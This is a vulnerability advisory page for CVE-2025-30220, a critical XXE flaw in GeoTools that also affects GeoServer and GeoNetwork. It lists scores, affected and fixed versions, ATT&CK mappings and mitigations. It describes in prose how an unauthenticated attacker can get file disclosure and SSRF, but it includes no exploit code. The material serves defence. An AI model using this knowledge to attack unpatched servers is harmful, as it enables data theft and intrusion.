Cyber Resilience

CVE-2025-30220

CriticalPublic PoC

Published: 10 June 2025

Published
10 June 2025
Modified
26 August 2025
KEV Added
Patch
CVSS Score v3.1 9.9 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
EPSS Score 0.1394 94.5th percentile
Risk Priority 28 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2025-30220 is a critical-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in Geotools Geotools. Its CVSS base score is 9.9 (Critical).

Operationally, exploitation aligns with the MITRE ATT&CK technique Data from Local System (T1005); ranked in the top 5.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

GeoServer is an open source server for sharing and editing geospatial data, and the vulnerability resides in the GeoTools gt-xsd-core Schemas class that relies on the Eclipse XSD library to handle schema structures. When XML documents reference external schemas, the class fails to apply any configured EntityResolver from ParserHandler, allowing XML External Entity processing. The same flaw affects the gt-wfs-ng DataStore because its ENTITY_RESOLVER connection parameter is not honored. The issue impacts GeoServer, GeoTools, and GeoNetwork installations that expose XML parsing paths.

An unauthenticated remote attacker can supply a crafted XML document containing external entity references to trigger XXE or related SSRF behavior. Successful exploitation can yield high-impact outcomes including arbitrary file disclosure, internal network probing, or limited service disruption, consistent with the CVSS 9.9 rating that reflects network attack vector, no required credentials or user interaction, and changed scope.

Official fixes are available in GeoTools 33.1, 32.3, 31.7 and 28.6.1, GeoServer 2.27.1, 2.26.3 and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13. GeoServer documentation recommends explicit configuration to disable external entity resolution, while GeoNetwork has published corresponding pull requests and a security advisory detailing the parameter-handling corrections.

The EPSS score stands at 0.1394 with no material increase from its recorded peak, indicating limited observed exploitation interest to date.

EU & UK References

Vulnerability details

GeoServer is an open source server that allows users to share and edit geospatial data. GeoTools Schema class use of Eclipse XSD library to represent schema data structure is vulnerable to XML External Entity (XXE) exploit. This impacts whoever exposes…

more

XML processing with gt-xsd-core involved in parsing, when the documents carry a reference to an external XML schema. The gt-xsd-core Schemas class is not using the EntityResolver provided by the ParserHandler (if any was configured). This also impacts users of gt-wfs-ng DataStore where the ENTITY_RESOLVER connection parameter was not being used as intended. This vulnerability is fixed in GeoTools 33.1, 32.3, 31.7, and 28.6.1, GeoServer 2.27.1, 2.26.3, and 2.25.7, and GeoNetwork 4.4.8 and 4.2.13.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1005 Data from Local System Collection
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
T1046 Network Service Discovery Discovery
Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation.
T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

XXE vulnerability (CWE-611) in GeoServer/GeoNetwork WFS services enables unauthenticated remote exploitation of public-facing application (T1190), local file disclosure (T1005), and SSRF for internal network service discovery (T1046).

Affected Assets

geotools
geotools
33.0 · ≤ 28.6.1 · 29.0 — 31.7 · 32.0 — 32.3
osgeo
geonetwork
4.2.0 — 4.2.13 · 4.4.0 — 4.4.8
osgeo
geoserver
2.27.0 · ≤ 2.25.7 · 2.26.0 — 2.26.3

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-611 CWE-918

Penetration testing includes XML external entity payloads, detecting XXE vulnerabilities and enabling their mitigation.

addresses: CWE-611 CWE-918

Identifies XML external entity processing via monitoring of unusual file/network access or resource usage.

addresses: CWE-918

Outbound connections to external resources can be monitored and limited at the boundary, reducing SSRF impact.

addresses: CWE-918

Validates server-side URLs and resource references to block SSRF attempts.

References